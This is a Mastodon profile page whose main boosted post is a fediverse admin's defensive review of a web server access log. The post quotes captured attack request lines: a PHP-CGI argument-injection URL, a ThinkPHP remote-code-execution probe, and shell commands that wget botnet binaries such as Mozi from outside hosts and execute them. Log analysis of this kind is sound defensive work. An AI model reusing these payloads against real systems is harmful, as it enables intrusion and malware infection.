León Castillejos @L1Cafe@social.privacytools.io
- Keybase
- l1cafe
- 🏠 Homepage
- https://L1Cafe.blog
- 💬 Languages
- 🇪🇸 🇬🇧
- 📍 Location
- 🇪🇺 EU Soutwest
- 💸 Donations
- https://L1Cafe.blog/donate/
#ComputerScience & #Engineering student, #cybersecurity enthusiast, #privacy advocate.
I blog about CTFs and system administration. Sometimes a bit of reverse engineering as well.
Posts are my own and do not represent the views of my employer.
Joined Apr 2019
León Castillejos
boosted
fediadmin, security, long
Did not clear my access log for some time, amassing over 300MBs.
What I looked at
Common attack patterns (SQLi, BOF, path traversal etc.)
Common attack URLs (e.g. https://github.com/danielmiessler/SecLists/)
Bad and unusual HTTP status codes
POST requests against unusual places (no inbox, push)
Findings
One IP tries to actively enumerate Fedi accounts: 75.64.236[.]168
241 IPs tried to blindly exploit non-fedi-specific services, e.g. SQL injects, posting shells
53 IPs did enumeration only, looking exploitable services and shells
Most popular was checking for Wordpress, phpMyAdmin and looking for existing shells
The crawler from fediverse[.]space seems okay, but if you want to block: 64.227.114[.]249
Details
Top attackers
211.21.226[.]123 Taiwan 122.14.213[.]79 China 113.53.230[.]34 Thailand 150.109.78[.]53 Singapore 118.25.38[.]1 China 118.25.111[.]38 China 106.12.40[.]125 China 103.45.99[.]20 China 47.199.217[.]59 US
The longest attack URL, used by many Chinese attackers
"POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1"
This URL decodes to:
-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
I’d rather not Think PHP, thanks
"GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1"
Ask and thou shalt receive. 16 attackers asked for a shell.
GET /shell.php HTTP/1.1
Kinda cute
"GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.137.154[.]33/reaper/reap.arm4;chmod+777+/tmp/reap.arm4;sh+/tmp/reap.arm4 HTTP/1.1" 404 146 "-" "Hello, world" "-" "GET /shell?cd+/tmp;rm+-rf+*;wget+http://117.13.206[.]99:34286/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" "GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets[.]net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear%60 HTTP/1.1"
Top unusal request lines
24 "https[:]//volcable.ru/" 21 "https[:]//jyvopys.com/" 18 "https[:]//vulkan-platinym24.ru/" 18 "https[:]//sexjk.com/" 18 "https[:]//glassdeskguide.com/" 18 "https[:]//dezgorkontrol.ru/" 18 "https[:]//brendof-club.com/" 18 "https[:]//arabic-poetry.com/" 18 "http[:]//hacron.ru/" 15 "https[:]//se.painting-planet.com/" 15 "https[:]//landofgames.ru/"
Does anyone know why I can reach reserved IPv4 address spaces like 10.200.0.0/16 from my OVH server?
OK, WireGuard time. First time using it, wish me luck. 
@quad Have you tried OpenNebula?
Hi! Do you know good books on climate research and terraforming? If you don't, can you boost / retweet this so it reaches more people? Maybe some of your followers know! Thanks!
@vickysteeves Hey, it's fine to not be good at "writing full things", nobody can be good at everything simultaneously, why not delegate?
@sheogorath My blog has date-style post links. The only downside is that it will break old links, so search engines and old notes need to be updated for that. https://l1cafe.blog/2019/03/03/kuya-1-writeup.html for example.
Crossposted from Twitter
BEGIN MESSAGE.Ob88AT43a5d6Fen qIZAIMYZO9KhQek Cr0Lr43nMB4y5Uu VlsorVpo6KASJOZfwZPoYhiTa4dKrq 8opTpkycEyxTCKq 6Xr2MZHgg6y63TV nsSlJSnUA8UI6G4H70n8XZz8D8bzp9 Jyo4iAh7PLciXpb 2GcNIGR4pFxeoZW xt7F5peQqSuqzknGd9zkNaFaKsiBlG IwFqAnz9ID2wSjA FNzPu2IP.END MESSAGE.
Interesting alternative to Keybase, after it has been acquired by Zoom.
https://techcrunch.com/2020/05/07/zoom-acquires-keybase-to-get-end-to-end-encryption-expertise/
@dildog Oh my gosh, that's super good! I'm happy for you and very, very sad for them 😂
León Castillejos
boosted
@amolith you can make your CI catching some of them:
https://git.shivering-isles.com/shivering-isles/blog/-/blob/deploy/.gitlab-ci.yml#L10
Always a good thing to throw an analyzer at your stuff before publishing 
@sheogorath @amolith Copying, thanks.
Oh, by the way, here's a link to the Vigil project. https://github.com/valeriansaliou/vigil
Just finished testing and deploying my Ansible script for https://status.kydara.com/
I'm using Vigil. It updates automatically and notifies me if anything goes wrong. This should make maintaining the whole infrastructure much easier, I hope!
- Keybase
- l1cafe
- 🏠 Homepage
- https://L1Cafe.blog
- 💬 Languages
- 🇪🇸 🇬🇧
- 📍 Location
- 🇪🇺 EU Soutwest
- 💸 Donations
- https://L1Cafe.blog/donate/
#ComputerScience & #Engineering student, #cybersecurity enthusiast, #privacy advocate.
I blog about CTFs and system administration. Sometimes a bit of reverse engineering as well.
Posts are my own and do not represent the views of my employer.
Joined Apr 2019
León Castillejos's choices:
